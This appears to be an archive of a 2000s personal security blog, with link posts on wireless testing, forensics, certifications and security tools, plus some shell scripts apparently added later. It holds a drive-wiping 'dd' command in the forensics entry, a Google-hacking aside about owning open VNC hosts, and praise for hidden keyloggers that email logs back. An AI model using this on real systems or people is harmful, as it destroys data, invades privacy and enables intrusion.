.: general archive


.: large list of papers at gomor.org
A large list of papers at gomor.org. A huge array of papers from wireless to programming languages to writing buffer overflows to hardware...
.: openWRT for Linksys WRT54G wireless AP
OpenWRT is a Linux firmware for the Linksys WRT54G wireless Router/AP. Not sure I have available hardware that I want to try putting this on, but maybe someday I will have a spare AP to see how this works out. Still, a really cool idea.
.: using Google for easy Web hacking
I've known this for some time, but finally have a good post to link. Tom's Hardware has a review of a Black Hat talk about the dangers and uses of Google in hacking.

I firmly believe that famed Adrian Lamo, the "drifter" hacker who performed his hacks using only a web browser and open cybercafe computers, utilized search engines in smart ways to find vulnerable sites.

You can easily do a search for the title of a web admin interface page and come up with potentially unprotected hits. For instance, I once found an open Linksys WRT54G web interface by typing in some combination of text that is found on the admin web interface. Limit a search for "admin" to a particular domain or company, and you might just find pages that some admin thought were hidden because no pages linked to them and they weren't known, i.e. they thought obscurity was enough security.

Just think, using Google to look up default and running VNC installs open to the public...just connect and 0wn.
.: wireless pen testing papers at secfocus
I've not had a chance to fully appreciate and check through this series of papers about pen testing wireless networks, but I didn't want to lose the link. Reminder to view the printable version to print.

Part 1
Part 2
Part 3
.: series on wireless lan tools
Just placing some links here for some wireless lan tools articles.

part 1
part 2
part 3
part 4
.: tgs tutorials galore
TGS has a nice list of tutorials that I should check out at some point.
.: microsoft port list
I did not know this, but it turns out Microsoft keeps a list of all the ports that various MS services use. This list is available for download as an Excel spreadsheet from the Microsoft site.
.: windows startup locations list
The list is kinda long, so I'll just link to it at Packet Storm.
.: turn off ssdp and upnp
Universal Plug-n-Play has been a nightmare of a vulnerable and useless service running by default on Windows XP systems. Patches have come and gone, but still, this service, coupled with SSDP, is simply useless and volunteers far too much information for prying eyes, as it readily displays the OS of a target machine to a hostile probe. Turning off the SSDP service in Windows XP also turns off the UPnP service, and doing so should be part of a base install configuration set. NIST standards include this disabling of SSDP as part of their XP procedures.
.: the art of war
A translation for The Art of War online. Another book that I should get, but I just don't know which version to pick up... I may just read this one, formulate my own conclusions and gain my own insight from it before picking up a book that expounds on the principles for me.
.: insider threat papers from the .gov
Two papers popped up as mentioned on another site I visit. First a paper discussing a number of insider security incidents over the past 8 years involving about 26 insiders at financial institutions. Second, a 4 year old paper from the DoD outlining means of mitigating insider threats.

Snippets shamelessly snagged from the other site in regards to the first paper:

"- Most of the incidents in the banking and finance sector were not technically sophisticated or complex. They typically involved the exploitation of non-technical vulnerabilities such as business rules or organization policies (rather than vulnerabilities in an information system or network) by individuals who had little or no technical expertise. In 87% of the cases the insiders employed simple, legitimate user commands to carry out the incidents, and in 78% of the incidents, the insiders were authorized users with active computer accounts.

- The majority of the incidents (81%) were devised and planned in advance. Furthermore, in most cases, others had knowledge of the insider's intentions, plans, and/or activities. Those who knew were often directly involved in the planning or stood to benefit from the activity.

- Most insiders (81%) were motivated by financial gain, rather than a desire to harm the company or information system.

- Insiders in this report fit no common profile. Only 23% held a technical position, 13% had a demonstrated interest in hacking and 27% had come to the attention of a supervisor or co-worker prior to the incident.

- Most of the incidents (83%) were executed physically from within the insider's organization and took place during normal business hours."
.: weplab wireless wep testing
Weplab is a tool that tests the strength of WEP encryption on a wireless network by breaking the encryption. I've not played with it, but it can be useful down the road.
.: tcp/ip illustrated vol. 1
The online book TCP/IP Illustrated Vol 1 is available online. Note that this is an older book dating from 1994, and is also not for the faint of heart as it skips past the high-level view of TCP/IP and actually digs right down into the nuts and bolts that make it work, in conjunction with real-world illustrative examples (hence the book name!). I should read this volume at some point, but maybe not quite yet until I get some more sniffing experience under my belt.
.: rules of thumb for security and defense
Joat posted this, so I'm going to copy it over:

Just keep in mind the general rules of thumb for security:
  • It's not "if" someone is going to break in, it's "when"...
  • in the real world the best you can hope for is fifteen minutes of fame, in the virtual world, the best you can hope for is fifteen minutes of obscurity... (quote mine)
  • there's no such thing as a secure online system...
  • and adding technology rarely adds security.
The general rules of thumb for countering attacks:
  • Log as much as practical
  • review your logs automatically AND manually
  • employ a consistent backup schedule
  • use your metrics, be able to recognize what's normal and what isn't
  • the most expensive investment in security is also the one you'll get the best return on: knowledge
Regardless of what personnel and what cool toys you have guarding your network, someone, somewhere, sometime will break into your network.
.: intro to security and much more
This site is basically a paper tackling an Introduction to Security...but it has so many links that it is just a very nice little page to link to and keep around and explore the links off of it, even if they're known sites and topics. A very nice intro-compilation.
.: quick networking rundown
This article is a very quick-shot laundry list of many network terms and items. The whole presentation makes my head spin because the author goes through each one in bambambambam rhythm, but still a nice little bit to read through in pieces.
.: 180solutions spyware/malware
Stole a bunch of links from another site describing some new spyware that adds some network traffic and unwanted ads on users' desktops and networks. 180Solutions might just hit someone I know at work someday soon.

180Solutions Analysis
Full disclosure at Seclists
Securiteam analysis of 180Solutions trojan
180Solutions : nCase
.: forensic case study article
The Role of Computer Forensics in Stopping Executive Fraud is a very interesting case study article illustrating various forensic concepts and techniques based around what the author says is a very real case study involving corporate fraud.

I found especially interesting some of the actual Linux command lines they used to both wipe and image data.

# > dd if=/dev/urandom of=/dev/hda
This fills the hard drive /dev/hda with random data; it can and should be repeated a number of times to sanitize a drive. dd is native to Linux.

# > dd if=/dev/hda of=/mnt/image.dd
This copies a bit-for-bit image of the drive /dev/hda into the file /mnt/image.dd on another (mounted) filesystem.

# > md5sum /dev/hda
Calculates a checksum of the whole drive. md5sum is native to Linux.

# > md5sum /mnt/image.dd
Calculates a checksum of the image file to verify that it matches the drive.
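The same wipe, image and verify sequence as an added shell example of my own (not code from the article or the case study it describes). It runs against a constructed 1 MiB file named drive.bin in place of /dev/hda so it is safe to execute anywhere, and it uses sha256sum where the article uses md5sum; the function names, the image name image.dd and the temp directory are assumptions.

```shell
#!/bin/sh
# Added example, not from the article: wipe / image / verify, wrapped in functions
# and run against a constructed sample file instead of a real block device.
export LC_ALL=C
set -u

# Constructed "drive": 1 MiB of repeating text standing in for disk sectors.
make_sample_drive() {
  yes 'sample sector data' | head -c 1048576 > "$1"
}

# The article's sanitizing step: overwrite the target in place with random bytes.
# count is derived from the target size (assumed a multiple of 4096 here);
# conv=notrunc keeps the size unchanged, as it would be on a real device.
wipe_target() {
  target="$1"
  bytes=$(wc -c < "$target")
  blocks=$(( (bytes + 4095) / 4096 ))
  dd if=/dev/urandom of="$target" bs=4096 count="$blocks" conv=notrunc 2>/dev/null
}

# Acquire a bit-for-bit image of $1 into file $2. conv=noerror,sync carries on
# past unreadable blocks and pads them with zeros instead of aborting the copy.
image_drive() {
  dd if="$1" of="$2" bs=4096 conv=noerror,sync 2>/dev/null
}

# Hash of a path. The article uses md5sum, which still catches copy errors, but
# it is not collision-resistant, so sha256sum is the better choice for evidence.
hash_of() {
  sha256sum "$1" | cut -d' ' -f1
}

# Return 0 when source and image hash to the same value, 1 otherwise.
verify_image() {
  src_hash=$(hash_of "$1")
  img_hash=$(hash_of "$2")
  echo "source: $src_hash"
  echo "image:  $img_hash"
  [ "$src_hash" = "$img_hash" ]
}

demo() {
  tmp=$(mktemp -d)
  make_sample_drive "$tmp/drive.bin"
  image_drive "$tmp/drive.bin" "$tmp/image.dd"
  if verify_image "$tmp/drive.bin" "$tmp/image.dd"; then
    echo "image verified"
  else
    echo "MISMATCH: image does not match source"
  fi
  before=$(hash_of "$tmp/drive.bin")
  wipe_target "$tmp/drive.bin"
  if [ "$before" != "$(hash_of "$tmp/drive.bin")" ]; then
    echo "drive contents overwritten"
  fi
  rm -rf "$tmp"
}
demo
```

On a real acquisition the hashes of the device and of the image are recorded before anything else touches either; a mismatch after the copy means the image cannot be relied on, and a later mismatch against the recorded value means the evidence changed.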
.: ten steps to getting into security
Scott,

I read the "Scott's 10 Steps for Becoming a CCIE" article (Sept. 14, 2004), but what about getting into security? I want to get into security, but I don't know where to start. Do you have a list of 10 ways to accomplish the five more marketable security certifications in IT?

-- Alex

Alex,

Getting into security is a rewarding experience, but like other IT fields, it requires a lot of work!

First, I'm not sure which you consider the "five more marketable" of the various security certifications out there. I suppose that would all depend on which specific area of security you want to do work in. Here are a couple certifications to consider:

- CISSP/SSCP -- From ISC2, http://www.isc2.org
- SCNA/SCNP -- From Security Certified Program, http://www.securitycertified.net
- CISA/CISM -- From ISACA, http://www.isaca.org
- GIAC/GSEC Series -- From SANS, http://www.sans.org
- Security+ -- From CompTIA, http://www.comptia.org
- CCSA/CCSA -- From CheckPoint, http://www.checkpoint.com
- CCSP/CCIE Security -- From Cisco Systems, http://www.cisco.com/go/certification
- JNCIA-FWV/JNCIS-FWV -- From Juniper networks (formerly NetScreen's NCSA/NCSP certifications), http://www.juniper.net/training/certification/netscreen

There are others, but the certs above are the primary ones that I can think of. The marketability of any of them certainly depends on your location and surrounding market environment.

Similar to what we, at my company, tell our clients regarding Internet security, it really isn't a matter of "if" you will be attacked but rather a matter of "when." As a security professional, you need to be thinking in this way, but you also need to balance it with a healthy dose of business sense. Being completely paranoid does make for good security, but it also leads to some decisions that make no sense, business-wise, or do not offer sufficient economic incentive. Therefore, consulting in security is concerned with costs as much as performance.

The things I recommend to keep in mind when approaching security certifications are similar to steps in previous guides I've provided in my regular column. Here's how to become a security consultant in 10 simple steps:

1. Give up your social life -- really. If you had one before, you will soon not have one, unless all of your friends like to talk about really esoteric topics and argue on the best way to protect against Internet attacks. But if you have friends like these, ask yourself serious questions about the quality of your social life.

2. Read, read, read, read and read some more! There are plenty of security books and magazines out there, but if you're relying on these for your sole sources of security information, then you're already behind the times. Don't get me wrong -- not that magazines are bad, but you need to stay more up-to-date than that!

Read things other than security magazines. Become familiar with your market and the businesses in your market. Get a sense of how they think and why. The better you can relate network security to any particular business and demonstrate your business sense (rather than technical paranoia), the more accepted you will be.

3. Learn about the bad people that keep security professionals busy. Don't idolize them, but try to think like they do. Attacks that can be anticipated are easier to defend against. You need to know the latest attacks as well as the latest strategies against them.

4. Set up your own network at home, preferably over a broadband connection from a popular provider. Do not place a firewall at the outer edge of your network. Try to defend against various attacks with your computer alone. Don't keep anything critical on this machine, as it may frequently need to be trashed and recreated. Despite the agony, you will learn a lot from these exercises.

5. Invest in equipment. Since money may be an issue, however, what to get and where to get it is a different story. Check out eBay and used equipment resellers. Depending on which of the certifications you go after, equipment may or may not be necessary, but at some point, you'll need hands-on experience playing with actual equipment to see how things work. No matter how meticulous you are and know your books inside-out, implementing any security product for the first time in real life when a client is watching you, or in response to a security breach, is a really bad idea.

6. Realize that any of the certifications listed above are merely starting points. Each of them is different in focus and detail. Some are technical and some are managerial. Some are vendor-specific and others are broad in scope. Each of them may highlight different areas of your experience or specialties, so one is not necessarily better than the other.

I know people with only the Security+ certification, which keeps them plenty busy at work. On the other hand, I know others with a CISSP as well as some of the more technical certifications who are doing a less-than-stellar job, in my opinion. It largely comes down to your market and how well you can convey your understanding of security to your customer base.

7. Learn to be anal-retentive. Perhaps dating a librarian would help here. Whatever method you use (and believe me, being meticulous in security design and concepts does not have to translate into how you live or organize your personal life), the more structured your approach to security is, the better. The best security design is one of "no more, no less," which gives users the abilities they need to do their jobs without granting them too much access. The more separated things are in your network, the easier it will be to quarantine any bad elements that may invade your system. But don't forget that the best security arrangement is transparent to your users.

8. Depending on which certifications you are working on, purchase as much varied equipment as you can. Performing firewall designs and integration exercises requires a completely different mindset from deploying VPN integrations. Both of these are completely different thinking processes from intrusion detection or prevention implementations.

Remember that home network I told you about? Install an IDS/IPS device or software facing your broadband connection. Watch all the entertaining things people will try to do to you, and to think you aren't even a "popular" target! But research the attacks that come in and be familiar with them. Just when you think you know enough, go back and look again! Things change! Conceptually, there aren't a lot of truly new attacks out there, but every once in a while, something will strike you as being original or creative, at which point, you should take notes. But be careful that you don't emulate these attackers!

9. Keep a journal. You may need three or four of these. Note your progress: your good points and your bad points. Keep separate notes organized on different technologies. Add to them as you learn something new. There are many evolving technologies, and many different areas of theory and technical configuration. The more repetition in writing, analyzing, rewriting, compiling and configuring you do, the better the information will stick in your long-term memory.

10. Attend a class, if possible. After you have been doing this all on your own for a while and are cruising through things, try to attend a class. There are many offered throughout the world with some better than others. Make sure to take the time to evaluate the class and its instructor. There is a huge variance in the quality of instructors out there, and the knowledge learned or not learned is often due to factors like this.

The more technical the certification you pursue, the more important taking a class is. There are different classes for the myriad of different certifications out there. A training course, however, should not be the first time you are subjected to a particular set of technologies or concepts. The first time you learn something, you won't know enough to ask questions or assimilate the information yet. After you've been working with a concept for a while, you'll have developed a basic grasp to be able to handle more advanced information. Of course, the quality of instructor you learn under will determine the quality of additional information you will add to your knowledge.

Becoming a security professional is a stimulating experience, and like with many things, the more you know, the more you realize you don't know. Security is a never-ending learning experience. As long as you realize that no matter how bright you are, there is always someone out there who is smarter than you, you'll do just fine.

Enjoy the educational journey and try not to lose yourself too much in the fray. Decide what aspect of security you want to accomplish first, and then narrow your choices from there!

-- Scott

Scott Morris, quadruple CCIE and Uber-Geek can often be seen traveling around the world consulting and delivering CCIE training. For more information on him check out http://www.uber-geek.net or for CCIE training check out http://www.ipexpert.com.
.: tech books for free - networking and security and more
TechBooksForFree has a small list of free e-books online.
.: sql injections
A beginner's article on explaining and performing some SQL Injections on web apps.
.: cissp quiz and video tutorials
This site has a large program that contains a small CISSP quiz set and some really cool entry/intermediate-level video tutorials on using some popular and not-as-popular scanning and penetration tools. The videos are free, some tools are linked off the site. The videos use a "tscc" TechSmith Camtasia codec, so that might need to be downloaded.
.: cissp training webcasts
Shon Harris is featured in a full series of CISSP training webcasts on SearchSecurity.com. These are free; you have to supply information to start the stream, but there is no requirement to supply legit information. Seems to work better on IE than Firefox. Webcasts are about 60 minutes each.
.: wep cracking
A SecurityFocus article on cracking WEP and other inherent issues with wireless. Includes a lot of nice tools and the links to those tools at the bottom.
.: Maturing of the Internet: Of Spam and Spyware
Now the 50-year-old Seemayer is once again on the cutting edge: Sick of spam clogging his in-box and spyware and viruses crashing his system, Seemayer yanked out his high-speed connection.

"I'm not going to pay for something that I can't use," he said.

A small but growing number of frustrated computer owners are coming to the same conclusion. They're giving up or cutting back their use of the Internet, especially at home, where no corporate tech support team will ride to their rescue.

Article is here

About 4 years ago the IT community hit a glut of new IT folk, many of whom didn't know what they were doing, as exponentially proliferating computers and broadband made a "computer expert" out of thousands and thousands of casual computer users every month. Now the point of this article rings very true, as I personally know people who are online less and whose taste for things Internet-related has soured, all due to spam and spyware. As people have hit the net in droves, so too have the vultures and the advertisers followed. Unfortunately, Microsoft's products (namely IE) were not engineered for such economies of scale; the holes were too big, and it only took time and a large enough marketplace for those holes to become so pervasively exploited that it is starting to backlash and drive people out of the niche.

I guess on the one hand it is good to see this trend, because it just means people like me are that much more practical today. Where once there was a geek who could help out now and then, people like me will soon become as necessary as white blood cells protecting a biological body. Fallout like this also scrapes off the chaff of the IT sector, leaving a hardier and better-skilled workforce to forge ahead into this maturing medium.

This backlash can only be temporary. The Internet is far too powerful a tool and even an integral component of life, especially for younger people. This won't last, but is just part of the growing phases... The Internet as a means of communicating, expression, information gathering and sharing, expanding marketplaces... There are times when people take a step back from consumerism and all the gadgets and toys of life, and some of them get back to being simpler, being happy in simplifying. But sometimes, some tools are just too life-changing, world-altering, that they can't just be dropped in the name of simplification...much like the steam engine, cars, airplanes, telephones.

...
There is a group at Best Buy called the Geek Squad who are available to help consumers with their computer questions and problems. However, I think there is still a very strong market for someone much more specialized: security persons. I think people can work their way into putting together printers and home networks by utilizing corporate support through vendors. However, there are few ways to "learn" how to deal with spam, spyware, adware, viruses, and malicious users/worms bouncing digital flak at their always-on broadband connections. There are few ways for people to pull themselves up out of the clutches of all this garbage and still be productive and efficient with their time and investments online. Getting a printer online is one thing, but confidently securing a home network and family is another.

.: analysis of an intrusion
This article details the tools used and the conclusions drawn from an intrusion into a system the author administers. Just nice to see tools and analysis in action.
.: Sed quis custodiet ipsos custodes?

Sed quis custodiet ipsos custodes?

.: Prolexic, zombienets, resources
Read an amazing article about defeating DDoS attacks. The main subject of the story went on to found Prolexic, a DDoS protection company which hosts a nice page of information about zombies and DDoS found here.
.: an old posting of various tools for search benefits

Ignore this post. I made the mistake of taking some old Blosxom postings and losing their publish date. So here is the data posted at an arbitrary date of Jan 1, 2006.

apprecon

AppRecon is a little Java tool that sends out discovery broadcast packets and then listens for any returns, which indicate those apps are present. Of note, currently returns back SQL Server, Symantec pcAnywhere, and Symantec Corporate Antivirus apps. Really pretty cool.

application protocol sniffing tools (msn, icq, aim...)

NextSecurity has a bunch of small tools (some freeware, most trial) to sniff various passwords and conversations on IM programs and other specialized stuff.

binary to text exe scanner

This really small and simple tool will take any .exe (installation or executable file I think), and convert the binary into words that make some sense. Again, not sure what this might do for me, but might be useful in forensics when analyzing what an unknown executable file is trying to do, or maybe better identify it. Still..might be useful to play with.


dns: bind leading the bind

This is an excellent online resource for links to BIND, which is the #1 tool on the Internet for DNS services.


chaos and clustering?

CHAOS is a tool to simplify creating a processing cluster. And a nice tutorial for using this cluster to work on password cracking. The tool sounds bootable and quite automatic, which could be pretty cool and a nice option instead of rainbow tables or just plain brute forcing or guessing passwords.


crowbar - web site brute forcer

Crowbar sounds like a web site brute forcer that should be worth a shot. This was supposedly either presented or at least mentioned at Defcon this year.


cygwin

I can't believe I don't have a link to it yet, but here is my entry for Cygwin, a more powerful shell alternative to the cmd prompt in Windows.


darwinports

Darwinports is an opensource project mostly for Mac OS X that, well, I'm not sure what it does without seeing it in action, but I had a strong recommendation for it that I didn't want to lose.


default password list link

This site has an updated list of default passwords for a variety of devices.


dsniff

Dsniff is a collection of network auditing tools: "dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI."


eagleeyeos: lock and log removable storage devices

EagleEyeOS will lock and log removable storage devices. The logging sounds like the really cool part to me...


eeye resources and tools

eEye Digital Security has a number of useful tools and scanners on their site, for free use. They include a lot of tools to scan smaller networks for specific worm or exploit vulnerabilities. Most notably, though, is nmapNT, an NT port for the *nix nmap tool.


etherpeek

Need to check out Etherpeek at some point too. Saw it mentioned on a mailing list as a recommended means to monitoring network traffic of some sort. I suspect it is similar to etherape and ethereal.


health check tool for exchange implementations

This tool for checking the health of an Exchange setup might be useful in the not-so-distant future.


firewalking: testing firewalls

There are a number of tools to test a firewall, also called "firewalking."


isic


hping / hping2


Update: And here is a tutorial on hping2.


fuzzing tools

If I ever want to get into fuzzing, that site is one of the places I'd start.


getting started with snort

This might be getting dated, but may help me someday when I get off my oinker and start looking into implementing snort full-time on my networks.


harpy - http constructor

Web site has an online HTTP constructor called HArPy. With it you can construct and send your own HTTP strings. Kinda fun to play with this and understand how web servers reply and how they log and/or block requests.


honeytrap and nepenthes

Honeytrap is a cool tool that will open a port(s) on your system and capture whatever attempts to come into it. It will do some low-level emulation of services, but mainly it is around to capture unknown vulnerabilities.


This is in contrast to nepenthes which will trigger on and capture only known vulnerabilities and exploits.


Now, neither of these tools runs natively on Windows, although one can attempt to compile them. But there is an older post I made here for Windows port listeners which really is much the same thing, especially if I can find one that emulates known ports as opposed to just opening a port and listening for anything.


host integrity checkers

There are really not that many truly gifted host integrity checkers out there. I remember at my last job we actually had no real digital integrity processes and got minorly dinged on that whole section on a security assessment review. I looked into the topic a bit back then and realized there's just really not that much out there. Sure you can make cases for rootkit sniffers and even anti-virus and filemon, but if you want to remain honest with yourself, these don't really count.


Here is a round-up of a bunch of integrity scanners (written and conducted by the author of one of the scanners). It might be a bit biased and dated (~2002) but still gives good info.


Samhain and Osiris are two very popular host integrity checkers (after, of course, Tripwire). They are so note-worthy that Syngress has a book out just for them: Host Integrity Monitoring Using Osiris and Samhain. AIDE is another tool I've heard good things about, but have not tried. Osiris can run on Windows as can Samhain when coupled with Cygwin.


update: an AIDE article - File Alteration Monitor (FAM) for nix - diff commands for Windows scripting

incident response tools

Just like a security or hacking event, incident response is something that *will* happen someday. This is just a pointer for me to a quick rundown of some kickass IR tools that I should become familiar with at some point.


inctrl5

Inctrl5 is an older tool developed by persons at or for PC Magazine to review software. A lot of people like me are curious about binaries they receive and how to see if they can be trusted (or to reverse engineer protections, limitations, etc) by using tools like Filemon and Regmon to see what changes the program is making. This can be time-consuming and error-prone as these tools capture a lot of stuff. Inctrl5 gets around most of the issues by taking snapshots of the registry and file system before and after an executable is run. This gives you a delta of your system and the ability to see what really changed and where. Pretty darn cool for a magazine tool!


installwatch and installrite

I'm not sure if I'll ever get a chance to drive these tools around, but InstallWatch will watch and report everything that a particular file does when installing. InstallRite is InstallWatch plus the ability to clone applications to distribute them, as an alternative to disk imaging. Not sure what that all entails, but might be useful.
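A minimal before/after integrity snapshot, added here as my own example (not code from Inctrl5, InstallWatch, Tripwire, Osiris, Samhain or AIDE) to show the idea behind both the host integrity checkers above and the install-watching tools: hash every file before, hash every file after, and diff the two lists. It uses only find, md5sum, sort, cut, comm and cmp, runs over a constructed directory tree, and assumes paths without newlines or backslashes; the snapshot format and function names are assumptions.

```shell
#!/bin/sh
# Added example, not any of the named tools' code: take a hash snapshot of a
# directory tree before and after an install (or on a schedule) and report what
# was added, removed or modified. Assumes paths contain no newlines/backslashes.
export LC_ALL=C
set -u

# Record a baseline of $1 into $2: one "path<TAB>md5" line per regular file,
# sorted so that two snapshots can be compared with comm. md5sum prints the
# 32-char digest, two spaces, then the path, hence the substr offsets.
snapshot() {
  dir="$1"; out="$2"
  find "$dir" -type f -exec md5sum {} + \
    | awk '{ print substr($0, 35) "\t" substr($0, 1, 32) }' \
    | sort > "$out"
}

# Print ADDED / REMOVED / MODIFIED lines for the differences between two
# snapshots. Exit status 0 means identical, 1 means something changed.
compare_snapshots() {
  before="$1"; after="$2"
  cut -f1 "$before" > "$before.paths"
  cut -f1 "$after"  > "$after.paths"
  comm -13 "$before.paths" "$after.paths" | sed 's/^/ADDED    /'
  comm -23 "$before.paths" "$after.paths" | sed 's/^/REMOVED  /'
  # a line present only in "after" whose path also exists in "before" means the
  # file is still there but its hash changed
  comm -13 "$before" "$after" | cut -f1 | comm -12 - "$before.paths" | sed 's/^/MODIFIED /'
  rm -f "$before.paths" "$after.paths"
  cmp -s "$before" "$after"
}

demo() {
  root=$(mktemp -d)
  mkdir -p "$root/app/etc"
  # constructed sample files standing in for an application's install
  printf 'port=22\n'   > "$root/app/etc/sshd.conf"
  printf 'binary v1\n' > "$root/app/bin"
  snapshot "$root/app" "$root/before.snap"
  # simulate an installer: it edits a config, drops a new file and removes one
  printf 'port=2222\n' > "$root/app/etc/sshd.conf"
  printf 'extra\n'     > "$root/app/etc/extra.conf"
  rm "$root/app/bin"
  snapshot "$root/app" "$root/after.snap"
  if compare_snapshots "$root/before.snap" "$root/after.snap"; then
    echo "no changes"
  else
    echo "changes detected"
  fi
  rm -rf "$root"
}
demo
```

The real tools add what this leaves out: metadata (owner, mode, mtime, inode) alongside the content hash, a baseline stored somewhere the monitored host cannot rewrite, and scheduled runs with alerting rather than a one-off diff.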


networking monitoring with intellimonitor

Intellimonitor is an agentless network monitoring solution. This is a commercial app, but might just be worth the trial and purchase in a corporate environment.


leak prevention test tool

I have not tested it yet, but this open source Leak Prevention Test tool supposedly tests for information leaks on a system. Not even sure how it does that, but wanted to record this link down.


tips to securing linux-based ssh

I've done a lot on here about Windows SSH, but not a whole lot with a purely Linux SSH build. Here are some tips to securing SSH on Linux.
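An added example of my own (not from the tips page linked above): a small shell audit that checks an sshd_config against a handful of the usual hardening settings, reading the file the way sshd does (comments stripped, directive names case-insensitive, first occurrence of a directive wins). It runs over two constructed sample configs, assumes a plain config without Match blocks, and checks only the real sshd directives PermitRootLogin, PasswordAuthentication, PermitEmptyPasswords, Protocol and X11Forwarding; the function names and expected values are my choices.

```shell
#!/bin/sh
# Added example, not from the linked tips page: audit an sshd_config against a
# few hardening expectations. Assumes a plain config with no Match blocks.
export LC_ALL=C
set -u

# directive|expected value (values chosen for this example)
RULES='PermitRootLogin|no
PasswordAuthentication|no
PermitEmptyPasswords|no
Protocol|2
X11Forwarding|no'

# Effective value of directive $1 in config file $2; empty when it is not set.
# Comments are stripped and only the first occurrence counts, as in sshd.
sshd_value() {
  awk -v k="$1" '
    { sub(/#.*/, "") }
    NF >= 2 && tolower($1) == tolower(k) && !seen { v = $2; seen = 1 }
    END { print v }' "$2"
}

# Print one line per rule; return the number of deviations (WEAK or UNSET).
audit_sshd_config() {
  cfg="$1"; findings=0
  while IFS='|' read -r key want; do
    got=$(sshd_value "$key" "$cfg")
    if [ -z "$got" ]; then
      echo "UNSET    $key (compiled-in default applies; expected $want)"
      findings=$((findings + 1))
    elif [ "$got" != "$want" ]; then
      echo "WEAK     $key=$got (expected $want)"
      findings=$((findings + 1))
    else
      echo "ok       $key=$got"
    fi
  done <<EOF
$RULES
EOF
  return "$findings"
}

# Constructed sample configs, not copied from any real host.
write_weak_config() {
  cat > "$1" <<'EOF'
Port 22
Protocol 2,1
PermitRootLogin yes
#PasswordAuthentication no
PermitEmptyPasswords no
EOF
}

write_hardened_config() {
  cat > "$1" <<'EOF'
Port 22
Protocol 2
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
X11Forwarding no
# the next line is ignored by sshd: the first PermitRootLogin above wins
PermitRootLogin yes
EOF
}

demo() {
  tmp=$(mktemp -d)
  write_weak_config "$tmp/sshd_config.weak"
  write_hardened_config "$tmp/sshd_config.hardened"
  for f in "$tmp/sshd_config.weak" "$tmp/sshd_config.hardened"; do
    echo "== $f"
    audit_sshd_config "$f"
    echo "findings: $?"
  done
  rm -rf "$tmp"
}
demo
```

Two things the weak sample illustrates: a directive that is only present as a comment is not set at all, so the compiled-in default (which differs between OpenSSH versions) is what actually applies, and a duplicated directive later in the file does nothing, which is easy to miss when hardening by appending lines.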


lsof

lsof (list open files) is a wonderful little tool for *nix systems.


mosquito framework

Mosquito looks like another exploit framework.


nbaudit - netbios (share) enumeration

The nbaudit tool is a security tool used to scan computers using NetBIOS, i.e. sharing files on the network. The tool will attempt to enumerate properties of those shares on the network. Usually associated with enumerating open shares on an NT network. The tool itself is a *nix/*BSD tool.


nessj - nessus client

Nessj looks like an awesome little Nessus client. This could be highly useful for cronies and managers who only want to run Windows and still utilize Nessus reports. I've known far too many of these types of people...


netbios auditing tool

Have not tested it, but the NetBIOS Auditing tool sounds interesting.


offline nt password and registry editor boot disk

The Offline NT Password and Registry Editor is an awesome little tool for recovering NT passwords by booting to a floppy or cd to begin editing passwords and registries, all without needing to boot into full-blown Windows.


From a security standpoint, this makes me nervous as all heck. I need to make a point to enable BIOS Setup password protection and to disable boot-from-cd and boot-from-floppy on all my systems someday. I will just play with this idea for now, just in case there is some reason to keep those settings. I don't want to make such a work-intensive reactionary decision without fully contemplating the consequences of it. I will note though, that I can make all the passwords the same because, honestly, how often do you see the BIOS Setup password exploited, cracked, or in the clear? You don't... :-)


omnipeek personal network analyzer

I had no idea WildPackets' OmniPeek Personal was a free tool until I saw it mentioned on a mailing list. The current version is 4.0 and it looks like a fully featured network analyzer suite. No registration or email is required to download the free version. Hopefully I can try this out and find it to not have any realistic limitations compared to their full-priced professional version.


openvpn

We use OpenVPN at work, so I thought this article on OpenVPN might be helpful and somewhat useful, since I am not the brightest on setting up something like OpenVPN.


paros 3.2.13

Paros 3.2.13 has been released. This is a really good scanner which works on Windows or nix.


pasco2

Pasco2 is an enhanced version of the original Pasco, which analyzes IE history and cache files, a particularly nice tool for any forensics work.


windows permissions identifier

Like the desc says, the Windows Permissions Identifier is a nice tool to audit permissions quickly on a server, especially for a penetration test or security audit. However, this is free and as such is not a fully robust management and reporting tool like you might get from ScriptLogic or Quest or BitVise, I believe.


pfprintd

pfprintd is another passive probing tool. This tool sniffs the wire and determines the OS based on the packets gathered. It is limited: it only analyzes some packets and recognizes some OSes.


port look-up page

This page allows you to look up port numbers and return back services on those ports. Arguably more useful than a flatfile list.


proactive security auditor aka l0phtcrack

Proactive Security Auditor is a password auditor for Windows, essentially an alternative if one cannot find L0phtCrack 5 (widely available, such as at Insecure.org). It attempts to crack passwords, and any password that cracks too quickly is deemed insecure. An interesting baselining tool, perhaps.


promqryui.exe

A promiscuous mode querying tool to find Windows computers with their NICs in promiscuous mode. I don't think I or anyone would have guessed this tool actually comes from Microsoft! And amazingly, I had yet to try it out or test it! PromqryUI.exe sounds pretty fun.


putty - step-by-step

This is a quick little step-by-step tutorial on using PuTTY, an SSH client, with port forwarding.


pwdump6 and fgdump updated

A few tools have been updated: pwdump6 (love that page!) and fgdump.


keyloggers - sc-keylog and homekeylogger

HomeKeyLogger is a nice keylogger for an always-on, one-user computer as you can hide it quite nicely and it always runs. FamilyKeyLogger is a commercial product useful for a computer that needs to be booted or has multiple users. The price is amazingly low too, so it is mostly worth it.


However, to step up to the bigs, there is SoftCentral's SC-KeyLog 2.4 app. This tool can obfuscate almost every part of a keylogger other than actually creating it as a service. It can also be packaged into an executable file to be deployed remotely and then email back the log file at specified times. The log file is encrypted and you can't do much about it without the password. A very nice and well-featured tool that can be a part of a penetration toolbox...all one needs is to copy it over and execute with privileges, much like netcat.


Now, if I could only find a free, safe keylogger that installs as a customizably-named service...


reverse dns lookup site

This site will perform a reverse DNS lookup for you, i.e. resolve an IP address into a domain name. This might not be very useful, since even Windows includes nslookup, which performs both forward and reverse DNS lookups, but it could come in handy someday in a locked-down environment or on an OS that does not have an easily-found nslookup tool.


rootkit detection tools

Two tools for detecting rootkits, one free, another not as free:


Rootkit Revealer from Sysinternals


Blacklight from F-Secure


Helios (in-action videos too)


rootkit hunter project

This is a quick blurb for rootkit hunter which basically runs a number of digital integrity checks to verify that a system has not been the victim of a rootkit infection. Pretty nice tool in theory, although I have yet to try it out.


rt on windows

